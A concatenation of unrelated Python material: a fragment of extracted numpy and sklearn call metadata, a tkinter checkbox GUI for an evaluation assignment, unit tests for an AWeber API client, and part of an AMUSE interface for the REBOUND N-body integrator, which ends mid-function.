{'n_clusters': '(10)'}), '(n_clusters=10)\n', (17917, 17932), False, 'from sklearn.cluster import KMeans\n'), ((18490, 18498), 'sklearn.decomposition.PCA', 'PCA', (['(0.9)'], {}), '(0.9)\n', (18493, 18498), False, 'from sklearn.decomposition import PCA\n'), ((1596, 1607), 'time.time', 'time.time', ([], {}), '()\n', (1605, 1607), False, 'import time\n'), ((1735, 1746), 'time.time', 'time.time', ([], {}), '()\n', (1744, 1746), False, 'import time\n'), ((2034, 2045), 'time.time', 'time.time', ([], {}), '()\n', (2043, 2045), False, 'import time\n'), ((4436, 4490), 'sklearn.decomposition.sparse_encode', 'sparse_encode', (['y', 'Xs'], {'algorithm': 'algorithm', 'alpha': 'alpha'}), '(y, Xs, algorithm=algorithm, alpha=alpha)\n', (4449, 4490), False, 'from sklearn.decomposition import sparse_encode\n'), ((4871, 4906), 'numpy.nonzero', 'np.nonzero', (['(coherence > tau + 1e-10)'], {}), '(coherence > tau + 1e-10)\n', (4881, 4906), True, 'import numpy as np\n'), ((9762, 9785), 'numpy.linalg.norm', 'np.linalg.norm', (['X[i, :]'], {}), '(X[i, :])\n', (9776, 9785), True, 'import numpy as np\n'), ((11525, 11542), 'numpy.matmul', 'np.matmul', (['X', 'X.T'], {}), '(X, X.T)\n', (11534, 11542), True, 'import numpy as np\n'), ((13566, 13594), 'matplotlib.pyplot.cm.get_cmap', 'plt.cm.get_cmap', (['"""tab10"""', '(10)'], {}), "('tab10', 10)\n", (13581, 13594), True, 'import matplotlib.pyplot as plt\n'), ((13849, 13867), 'numpy.dot', 'np.dot', (['p1_u', 'p2_u'], {}), '(p1_u, p2_u)\n', (13855, 13867), True, 'import numpy as np\n'), ((15882, 15922), 'numpy.cumsum', 'np.cumsum', (['pca.explained_variance_ratio_'], {}), '(pca.explained_variance_ratio_)\n', (15891, 15922), True, 'import numpy as np\n'), ((18228, 18248), 'sklearn.cluster.KMeans', 'KMeans', 
([], {'n_clusters': 'K'}), '(n_clusters=K)\n', (18234, 18248), False, 'from sklearn.cluster import KMeans\n'), ((18597, 18617), 'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': 'K'}), '(n_clusters=K)\n', (18603, 18617), False, 'from sklearn.cluster import KMeans\n'), ((2485, 2584), 'sklearn.neighbors.kneighbors_graph', 'kneighbors_graph', (['normalized_representation_matrix_', '(3)'], {'mode': '"""connectivity"""', 'include_self': '(False)'}), "(normalized_representation_matrix_, 3, mode='connectivity',\n include_self=False)\n", (2501, 2584), False, 'from sklearn.neighbors import kneighbors_graph\n'), ((2989, 3024), 'scipy.sparse.identity', 'sparse.identity', (['laplacian.shape[0]'], {}), '(laplacian.shape[0])\n', (3004, 3024), False, 'from scipy import sparse\n'), ((3862, 3878), 'numpy.dot', 'np.dot', (['X', 'L2sol'], {}), '(X, L2sol)\n', (3868, 3878), True, 'import numpy as np\n'), ((4236, 4258), 'numpy.asfortranarray', 'np.asfortranarray', (['y.T'], {}), '(y.T)\n', (4253, 4258), True, 'import numpy as np\n'), ((4519, 4533), 'numpy.dot', 'np.dot', (['cs', 'Xs'], {}), '(cs, Xs)\n', (4525, 4533), True, 'import numpy as np\n'), ((4800, 4818), 'numpy.dot', 'np.dot', (['delta', 'X.T'], {}), '(delta, X.T)\n', (4806, 4818), True, 'import numpy as np\n'), ((5060, 5073), 'numpy.abs', 'np.abs', (['cs[0]'], {}), '(cs[0])\n', (5066, 5073), True, 'import numpy as np\n'), ((5401, 5471), 'numpy.argpartition', 'np.argpartition', (['(-coherence[addedsupp])', '(support_size - activesupp.size)'], {}), '(-coherence[addedsupp], support_size - activesupp.size)\n', (5416, 5471), True, 'import numpy as np\n'), ((9948, 9972), 'numpy.matmul', 'np.matmul', (['residual', 'X.T'], {}), '(residual, X.T)\n', (9957, 9972), True, 'import numpy as np\n'), ((10070, 10090), 'numpy.argmax', 'np.argmax', (['coherence'], {}), '(coherence)\n', (10079, 10090), True, 'import numpy as np\n'), ((10143, 10195), 'numpy.linalg.lstsq', 'np.linalg.lstsq', (['X[supp, :].T', 'X[i, :].T'], {'rcond': 'None'}), '(X[supp, :].T, X[i, :].T, rcond=None)\n', (10158, 10195), True, 'import numpy as np\n'), ((10264, 10290), 'numpy.matmul', 'np.matmul', (['c.T', 'X[supp, :]'], {}), '(c.T, X[supp, :])\n', (10273, 10290), True, 'import numpy as np\n'), ((10338, 10359), 'numpy.sum', 'np.sum', (['(residual ** 2)'], {}), '(residual ** 2)\n', (10344, 10359), True, 'import numpy as np\n'), ((11739, 11756), 'numpy.matmul', 'np.matmul', (['X', 'tmp'], {}), '(X, tmp)\n', (11748, 11756), True, 'import numpy as np\n'), ((11882, 11898), 'numpy.eye', 'np.eye', (['n_sample'], {}), '(n_sample)\n', (11888, 11898), True, 'import numpy as np\n'), ((12103, 12120), 'numpy.matmul', 'np.matmul', (['X', 'tmp'], {}), '(X, tmp)\n', (12112, 12120), True, 'import numpy as np\n'), ((14252, 14273), 'pandas.Series', 'pd.Series', (['rand_indx1'], {}), '(rand_indx1)\n', (14261, 14273), True, 'import pandas as pd\n'), ((14290, 14324), 'random.choices', 'random.choices', (['Y.index[Y == Y[x]]'], {}), '(Y.index[Y == Y[x]])\n', (14304, 14324), False, 'import random\n'), ((14392, 14413), 'pandas.Series', 'pd.Series', (['rand_indx1'], {}), '(rand_indx1)\n', (14401, 14413), True, 'import pandas as pd\n'), ((14430, 14464), 'random.choices', 'random.choices', (['Y.index[Y != Y[x]]'], {}), '(Y.index[Y != Y[x]])\n', (14444, 14464), False, 'import random\n'), ((2305, 2351), 'numpy.absolute', 'np.absolute', (['normalized_representation_matrix_'], {}), '(normalized_representation_matrix_)\n', (2316, 2351), True, 'import numpy as np\n'), ((2354, 2402), 'numpy.absolute', 'np.absolute', 
(['normalized_representation_matrix_.T'], {}), '(normalized_representation_matrix_.T)\n', (2365, 2402), True, 'import numpy as np\n'), ((3824, 3838), 'numpy.dot', 'np.dot', (['X.T', 'X'], {}), '(X.T, X)\n', (3830, 3838), True, 'import numpy as np\n'), ((4262, 4285), 'numpy.asfortranarray', 'np.asfortranarray', (['Xs.T'], {}), '(Xs.T)\n', (4279, 4285), True, 'import numpy as np\n'), ((4658, 4678), 'numpy.power', 'np.power', (['delta', '(2.0)'], {}), '(delta, 2.0)\n', (4666, 4678), True, 'import numpy as np\n'), ((6661, 6673), 'numpy.amax', 'np.amax', (['coh'], {}), '(coh)\n', (6668, 6673), True, 'import numpy as np\n'), ((11667, 11684), 'numpy.matmul', 'np.matmul', (['X.T', 'X'], {}), '(X.T, X)\n', (11676, 11684), True, 'import numpy as np\n'), ((11836, 11853), 'numpy.matmul', 'np.matmul', (['X', 'X.T'], {}), '(X, X.T)\n', (11845, 11853), True, 'import numpy as np\n'), ((12017, 12034), 'numpy.matmul', 'np.matmul', (['X.T', 'X'], {}), '(X.T, X)\n', (12026, 12034), True, 'import numpy as np\n'), ((3790, 3813), 'numpy.identity', 'np.identity', (['y.shape[1]'], {}), '(y.shape[1])\n', (3801, 3813), True, 'import numpy as np\n'), ((3921, 3931), 'numpy.abs', 'np.abs', (['c0'], {}), '(c0)\n', (3927, 3931), True, 'import numpy as np\n'), ((4573, 4586), 'numpy.abs', 'np.abs', (['cs[0]'], {}), '(cs[0])\n', (4579, 4586), True, 'import numpy as np\n'), ((4615, 4635), 'numpy.power', 'np.power', (['cs[0]', '(2.0)'], {}), '(cs[0], 2.0)\n', (4623, 4635), True, 'import numpy as np\n'), ((6616, 6630), 'numpy.dot', 'np.dot', (['X', 'y.T'], {}), '(X, y.T)\n', (6622, 6630), True, 'import numpy as np\n'), ((7049, 7071), 'numpy.asfortranarray', 'np.asfortranarray', (['y.T'], {}), '(y.T)\n', (7066, 7071), True, 'import numpy as np\n'), ((7283, 7336), 'sklearn.decomposition.sparse_encode', 'sparse_encode', (['y', 'X'], {'algorithm': 'algorithm', 'alpha': 'alpha'}), '(y, X, algorithm=algorithm, alpha=alpha)\n', (7296, 7336), False, 'from sklearn.decomposition import sparse_encode\n'), ((11687, 11705), 'numpy.eye', 'np.eye', (['n_features'], {}), '(n_features)\n', (11693, 11705), True, 'import numpy as np\n'), ((11856, 11872), 'numpy.eye', 'np.eye', (['n_sample'], {}), '(n_sample)\n', (11862, 11872), True, 'import numpy as np\n'), ((12037, 12055), 'numpy.eye', 'np.eye', (['n_features'], {}), '(n_features)\n', (12043, 12055), True, 'import numpy as np\n'), ((7075, 7097), 'numpy.asfortranarray', 'np.asfortranarray', (['X.T'], {}), '(X.T)\n', (7092, 7097), True, 'import numpy as np\n'), ((7642, 7663), 'numpy.absolute', 'np.absolute', (['c[index]'], {}), '(c[index])\n', (7653, 7663), True, 'import numpy as np\n'), ((11585, 11601), 'numpy.eye', 'np.eye', (['n_sample'], {}), '(n_sample)\n', (11591, 11601), True, 'import numpy as np\n'), ((4042, 4056), 'numpy.dot', 'np.dot', (['y', 'X.T'], {}), '(y, X.T)\n', (4048, 4056), True, 'import numpy as np\n')] |
from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar
from evaluator import Evaluator
class Win(Tk):
def __init__(self):
Tk.__init__(self, None, None)
self.wm_title('My first window')
self.evaluator = Evaluator()
self.label_var = StringVar()
Label(self, text="Result: ").pack()
#ASSIGNMENT13: add the textvariable property and set its value to self.label_var
        Label(self, textvariable=self.label_var).pack()
#ASSIGNMENT13: add the command property for the button and set its value to self.button_evaluate_handler
Button(self, text='Evaluate', command = self.button_evaluate_handler).pack()
self.__init__radio_buttons()
self.mainloop()
def __init__radio_buttons(self):
self.check_var_nev = IntVar()
self.check_var_rar = IntVar()
self.check_var_som = IntVar()
self.check_var_oft = IntVar()
self.check_var_v_oft = IntVar()
self.check_var_always = IntVar()
self.check_var_nev.set(0)
self.check_var_rar.set(0)
self.check_var_som.set(0)
self.check_var_oft.set(0)
self.check_var_v_oft.set(0)
self.check_var_always.set(0)
#ASSIGNMENT 13:
        #for each IntVar created above, write code to create a checkbox with the text attribute
#Never, Rarely, Sometimes, Often, Very Often, Always
#and link the IntVar to the Checkbox variable attribute
self.check_nev = Checkbutton(self, text= 'Never', variable = self.check_var_nev)
self.check_rar = Checkbutton(self, text= 'Rarely', variable = self.check_var_rar)
self.check_som = Checkbutton(self, text= 'Sometimes', variable = self.check_var_som)
self.check_oft = Checkbutton(self, text= 'Often', variable = self.check_var_oft)
self.check_v_oft = Checkbutton(self, text= 'Very Often', variable = self.check_var_v_oft)
self.check_always = Checkbutton(self, text= 'Always', variable = self.check_var_always)
self.check_nev.pack()
self.check_rar.pack()
self.check_som.pack()
self.check_oft.pack()
self.check_v_oft.pack()
self.check_always.pack()
def button_evaluate_handler (self):
self.label_var.set(self.evaluator.faculty_evaluation_result(
0 if self.check_var_nev.get()== 0 else 1 ,
0 if self.check_var_rar.get()== 0 else 2,
0 if self.check_var_som.get()== 0 else 3,
0 if self.check_var_oft.get()== 0 else 25,
0 if self.check_var_v_oft.get()== 0 else 50,
0 if self.check_var_always.get()== 0 else 150))
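# Usage sketch (assumption): instantiating Win is enough to start the GUI,
# because __init__ ends by calling mainloop(). Evaluator.faculty_evaluation_result
# is assumed to return a value that StringVar.set() can display.
#
# if __name__ == '__main__':
#     Win()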
| [
"tkinter.IntVar",
"tkinter.Checkbutton",
"evaluator.Evaluator",
"tkinter.Button",
"tkinter.StringVar",
"tkinter.Tk.__init__",
"tkinter.Label"
] | [((152, 181), 'tkinter.Tk.__init__', 'Tk.__init__', (['self', 'None', 'None'], {}), '(self, None, None)\n', (163, 181), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((248, 259), 'evaluator.Evaluator', 'Evaluator', ([], {}), '()\n', (257, 259), False, 'from evaluator import Evaluator\n'), ((285, 296), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (294, 296), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((826, 834), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (832, 834), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((864, 872), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (870, 872), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((902, 910), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (908, 910), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((940, 948), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (946, 948), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((980, 988), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (986, 988), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1021, 1029), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (1027, 1029), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1495, 1555), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Never"""', 'variable': 'self.check_var_nev'}), "(self, text='Never', variable=self.check_var_nev)\n", (1506, 1555), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1584, 1645), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Rarely"""', 'variable': 'self.check_var_rar'}), "(self, text='Rarely', variable=self.check_var_rar)\n", (1595, 1645), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1674, 1738), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Sometimes"""', 'variable': 'self.check_var_som'}), "(self, text='Sometimes', variable=self.check_var_som)\n", (1685, 1738), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1767, 1827), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Often"""', 'variable': 'self.check_var_oft'}), "(self, text='Often', variable=self.check_var_oft)\n", (1778, 1827), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1858, 1925), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Very Often"""', 'variable': 'self.check_var_v_oft'}), "(self, text='Very Often', variable=self.check_var_v_oft)\n", (1869, 1925), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1957, 2021), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Always"""', 'variable': 'self.check_var_always'}), "(self, text='Always', variable=self.check_var_always)\n", (1968, 2021), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((305, 333), 'tkinter.Label', 'Label', (['self'], {'text': '"""Result: """'}), "(self, text='Result: ')\n", (310, 333), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((439, 471), 'tkinter.Label', 'Label', (['self'], {'text': 'self.label_var'}), '(self, text=self.label_var)\n', (444, 471), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((611, 678), 'tkinter.Button', 
'Button', (['self'], {'text': '"""Evaluate"""', 'command': 'self.button_evaluate_handler'}), "(self, text='Evaluate', command=self.button_evaluate_handler)\n", (617, 678), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n')] |
from unittest import TestCase
from mock_adapter import MockAdapter
from mock import Mock
from aweber_api import (AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL,
REQUEST_TOKEN_URL, AWeberEntry)
key = 'XXXXX'
secret = '3434534534534'
class AWeberAPITest(TestCase):
def setUp(self):
self.aweber = AWeberAPI(key, secret)
def test_should_exist(self):
self.assertTrue(self.aweber)
class WhenGettingARequestToken(AWeberAPITest):
def setUp(self):
AWeberAPITest.setUp(self)
self.response = "oauth_token=<PASSWORD>&oauth_token_secret=abcd"
self.aweber.adapter = Mock()
self.aweber.adapter.user = AWeberUser()
self.aweber.adapter.request = Mock(return_value=self.response)
def test_should_get_request_token(self):
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertEqual(token, '<PASSWORD>')
self.assertEqual(secret, 'abcd')
def test_should_pass_args_to_request(self):
self.called = False
def _request(method, url, params):
self.assertEqual(url, REQUEST_TOKEN_URL)
self.assertEqual(method, 'POST')
self.assertEqual(params['oauth_callback'], 'http://localhost/demo')
self.called = True
return self.response
self.aweber.adapter.request = _request
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertTrue(self.called, 'Called _request')
def test_should_set_up_user(self):
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertEqual(self.aweber.user.request_token, token)
self.assertEqual(self.aweber.user.token_secret, secret)
def test_should_have_authorize_url(self):
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertEqual(self.aweber.authorize_url,
"{0}?oauth_token={1}".format(AUTHORIZE_URL, token))
class WhenGettingAnAccessToken(AWeberAPITest):
def setUp(self):
AWeberAPITest.setUp(self)
self.response = "oauth_token=<PASSWORD>&oauth_token_secret=hotdog"
self.aweber.adapter = Mock()
self.aweber.adapter.user = AWeberUser()
self.aweber.adapter.request = Mock(return_value=self.response)
self.aweber.user.request_token = '<PASSWORD>'
self.aweber.user.token_secret = 'abcd'
self.aweber.user.verifier = '234a35a1'
def test_should_get_access_token(self):
access_token, token_secret = self.aweber.get_access_token()
self.assertEqual(access_token, '<PASSWORD>')
self.assertEqual(token_secret, 'hotdog')
def test_should_pass_args_to_request(self):
self.called = False
def _request(method, url, params={}):
self.assertEqual(url, ACCESS_TOKEN_URL)
self.assertEqual(method, 'POST')
self.assertEqual(params['oauth_verifier'], '234a35a1')
self.called = True
return self.response
self.aweber.adapter.request = _request
token, secret = self.aweber.get_access_token()
self.assertTrue(self.called, 'Called _request')
def test_should_set_up_user(self):
token, secret = self.aweber.get_access_token()
self.assertEqual(self.aweber.user.access_token, token)
self.assertEqual(self.aweber.user.token_secret, secret)
class WhenGettingAnAccount(TestCase):
def setUp(self):
self.aweber = AWeberAPI(key, secret)
self.aweber.adapter = MockAdapter()
self.access_token = '<PASSWORD>'
self.token_secret = 'abcd'
def test_when_getting_an_account(self):
account = self.aweber.get_account(self.access_token, self.token_secret)
self.assertEqual(type(account), AWeberEntry)
self.assertEqual(account.id, 1)
self.assertEqual(account.type, 'account')
| [
"mock.Mock",
"aweber_api.AWeberUser",
"aweber_api.AWeberAPI",
"mock_adapter.MockAdapter"
] | [((340, 362), 'aweber_api.AWeberAPI', 'AWeberAPI', (['key', 'secret'], {}), '(key, secret)\n', (349, 362), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((641, 647), 'mock.Mock', 'Mock', ([], {}), '()\n', (645, 647), False, 'from mock import Mock\n'), ((683, 695), 'aweber_api.AWeberUser', 'AWeberUser', ([], {}), '()\n', (693, 695), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((734, 766), 'mock.Mock', 'Mock', ([], {'return_value': 'self.response'}), '(return_value=self.response)\n', (738, 766), False, 'from mock import Mock\n'), ((2236, 2242), 'mock.Mock', 'Mock', ([], {}), '()\n', (2240, 2242), False, 'from mock import Mock\n'), ((2278, 2290), 'aweber_api.AWeberUser', 'AWeberUser', ([], {}), '()\n', (2288, 2290), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((2329, 2361), 'mock.Mock', 'Mock', ([], {'return_value': 'self.response'}), '(return_value=self.response)\n', (2333, 2361), False, 'from mock import Mock\n'), ((3541, 3563), 'aweber_api.AWeberAPI', 'AWeberAPI', (['key', 'secret'], {}), '(key, secret)\n', (3550, 3563), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((3594, 3607), 'mock_adapter.MockAdapter', 'MockAdapter', ([], {}), '()\n', (3605, 3607), False, 'from mock_adapter import MockAdapter\n')] |
from amuse.community import *
from amuse.community.interface.gd import GravitationalDynamicsInterface
from amuse.community.interface.gd import GravitationalDynamics
from amuse.community.interface.gd import SinglePointGravityFieldInterface
from amuse.community.interface.gd import GravityFieldCode
class ReboundInterface(CodeInterface,
LiteratureReferencesMixIn,
GravitationalDynamicsInterface,
StoppingConditionInterface,
#SinglePointGravityFieldInterface
):
"""
REBOUND - An open-source multi-purpose N-body code
.. [#] <NAME>., <NAME>., *Astronomy and Astrophysics* , **Volume 537**, A128 (2012)
For different integrators, cite:
... IAS15: <NAME>., <NAME>., *MNRAS* , **Volume 446**, Issue 2, p.1424-1437 (2015)
... WHFast: <NAME>., <NAME>., *MNRAS* , **Volume 452**, Issue 1, p.376-388 (2015)
... Hermes: <NAME>., et al., in prep.
... SEI: <NAME>., <NAME>., *MNRAS* , **Volume 415**, Issue 4, p.3168-3176 (2011)
... JANUS: <NAME>., <NAME>., *arXiv* , 1704.07715 (2017)
"""
include_headers = ['worker_code.h', 'stopcond.h']
__so_module__ = 'rebound_cython'
def __init__(self, **options):
CodeInterface.__init__(self, name_of_the_worker="rebound_worker",
**options)
LiteratureReferencesMixIn.__init__(self)
@legacy_function
def new_particle():
"""
Define a new particle in the stellar dynamics code. The particle is initialized with the provided
mass, radius, position and velocity. This function returns an index that can be used to refer
to this particle.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_particle', dtype='int32', direction=function.OUT, description =
"""
An index assigned to the newly created particle.
This index is supposed to be a local index for the code
(and not valid in other instances of the code or in other codes)
"""
)
function.addParameter('mass', dtype='float64', direction=function.IN, description = "The mass of the particle")
function.addParameter('x', dtype='float64', direction=function.IN, description = "The initial position vector of the particle")
function.addParameter('y', dtype='float64', direction=function.IN, description = "The initial position vector of the particle")
function.addParameter('z', dtype='float64', direction=function.IN, description = "The initial position vector of the particle")
function.addParameter('vx', dtype='float64', direction=function.IN, description = "The initial velocity vector of the particle")
function.addParameter('vy', dtype='float64', direction=function.IN, description = "The initial velocity vector of the particle")
function.addParameter('vz', dtype='float64', direction=function.IN, description = "The initial velocity vector of the particle")
function.addParameter('radius', dtype='float64', direction=function.IN, description = "The radius of the particle", default = 0)
function.addParameter('subset', dtype='int32', direction=function.IN, description = "The subset index of the particle (defaults to 0, use new_subset for higher indices)", default = 0)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
particle was created and added to the model
-1 - ERROR
particle could not be created"""
return function
def delete_particle(self, index_of_the_particle, code_index=0):
return self._delete_particle(index_of_the_particle, code_index)
@legacy_function
def _delete_particle():
"""
Delete a particle.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN, description ="Index of the particle")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
particle was deleted
-1 - ERROR
particle not deleted"""
return function
@legacy_function
def _set_integrator():
function = LegacyFunctionSpecification()
function.addParameter('integrator_name', dtype='i', direction=function.IN)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.can_handle_array = False
return function
@legacy_function
def _get_integrator():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('integrator_name', dtype='i', direction=function.OUT)
function.result_type = 'int32'
function.can_handle_array = False
return function
INTEGRATORS = {"ias15": 0, "whfast": 1, "sei": 2, "leapfrog": 4, "hermes": 5, "whfast-helio": 6, "none": 7, "janus": 8}
def set_integrator(self, name, code_index = 0 ):
return self._set_integrator(self.INTEGRATORS[name], code_index)
def get_integrator(self, code_index = 0):
value, error = self._get_integrator(code_index)
for key, index in self.INTEGRATORS.items():
if value == index:
return key
return "none"
@legacy_function
def _set_solver():
function = LegacyFunctionSpecification()
function.addParameter('solver_name', dtype='i', direction=function.IN)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.can_handle_array = False
return function
@legacy_function
def _get_solver():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('solver_name', dtype='i', direction=function.OUT)
function.result_type = 'int32'
function.can_handle_array = False
return function
SOLVERS = {"none": 0, "basic": 1, "compensated": 2, "tree": 3}
def set_solver(self, name, code_index = 0 ):
return self._set_solver(self.SOLVERS[name], code_index)
def get_solver(self, code_index = 0):
value, error = self._get_solver(code_index)
for key, index in self.SOLVERS.items():
if value == index:
return key
return "none"
@legacy_function
def get_opening_angle2():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('opening_angle2', dtype='float64', direction=function.OUT,
description = "theta, the opening angle for building the tree: between 0 and 1")
function.result_type = 'int32'
return function
@legacy_function
def set_opening_angle2():
function = LegacyFunctionSpecification()
function.addParameter('opening_angle2', dtype='float64', direction=function.IN,
description = "theta, the opening angle for building the tree: between 0 and 1")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
return function
@legacy_function
def get_eps2():
        """
        Get epsilon^2, a softening parameter for gravitational potentials with point particles.
        """
        function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('epsilon_squared', dtype='float64', direction=function.OUT,
description = "epsilon^2, a softening parameter for gravitational potentials with point particles",
unit = nbody_system.length * nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was retrieved
-1 - ERROR
could not retrieve parameter
"""
return function
@legacy_function
def set_eps2():
"""
Set epsilon^2, a softening parameter for gravitational potentials with point particles.
"""
function = LegacyFunctionSpecification()
function.addParameter('epsilon_squared', dtype='float64', direction=function.IN,
description = "epsilon^2, a softening parameter for gravitational potentials with point particles",
unit = nbody_system.length * nbody_system.length)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was set
-1 - ERROR
could not set parameter
"""
return function
@legacy_function
def _set_boundary():
function = LegacyFunctionSpecification()
function.addParameter('boundary_name', dtype='i', direction=function.IN)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.can_handle_array = False
return function
@legacy_function
def _get_boundary():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('boundary_name', dtype='i', direction=function.OUT)
function.result_type = 'int32'
function.can_handle_array = False
return function
BOUNDARIES = {"none": 0, "open": 1, "periodic": 2, "shear": 3}
def set_boundary(self, name, code_index = 0 ):
return self._set_boundary(self.BOUNDARIES[name], code_index)
def get_boundary(self, code_index = 0):
value, error = self._get_boundary(code_index)
for key, index in self.BOUNDARIES.items():
if value == index:
return key
return "none"
@legacy_function
def get_boundary_size():
        """
        Get the size of the boundaries.
        """
        function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('boundary_size', dtype='float64', direction=function.OUT,
description = "boundary size",
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was retrieved
-1 - ERROR
could not retrieve parameter
"""
return function
@legacy_function
def set_boundary_size():
"""
Set size of the boundaries.
"""
function = LegacyFunctionSpecification()
function.addParameter('boundary_size', dtype='float64', direction=function.IN,
description = "boundary size",
unit = nbody_system.length)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was set
-1 - ERROR
could not set parameter
"""
return function
@legacy_function
def set_time_step():
"""
Update timestep.
"""
function = LegacyFunctionSpecification()
function.addParameter('timestep', dtype='float64', direction=function.IN,
description = "timestep")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """
0 - OK
timestep was changed
"""
return function
@legacy_function
def get_potential_energy():
"""
Retrieve the current potential energy of the model
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('potential_energy', dtype='float64', direction=function.OUT,
description = "The potential energy of the model")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the potential energy was set
-1 - ERROR
Kinetic potential could not be provided
"""
return function
@legacy_function
def get_kinetic_energy():
"""
Retrieve the current kinetic energy of the model
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('kinetic_energy', dtype='float64', direction=function.OUT,
description = "The kinetic energy of the model")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the kinetic energy was set
-1 - ERROR
Kinetic energy could not be provided
"""
return function
@legacy_function
def evolve_model():
"""
Evolve the model until the given time, or until a stopping condition is set.
"""
function = LegacyFunctionSpecification()
function.addParameter('time', dtype='float64', direction=function.IN,
description = "Model time to evolve the code to. The model will be "
"evolved until this time is reached exactly or just after.")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound (default -1, evolve all systems)", default = -1)
function.result_type = 'int32'
return function
@legacy_function
def get_time():
"""
Retrieve the model time. This time should be close to the end time specified
in the evolve code. Or, when a collision was detected, it will be the
model time of the collision.
"""
function = LegacyFunctionSpecification()
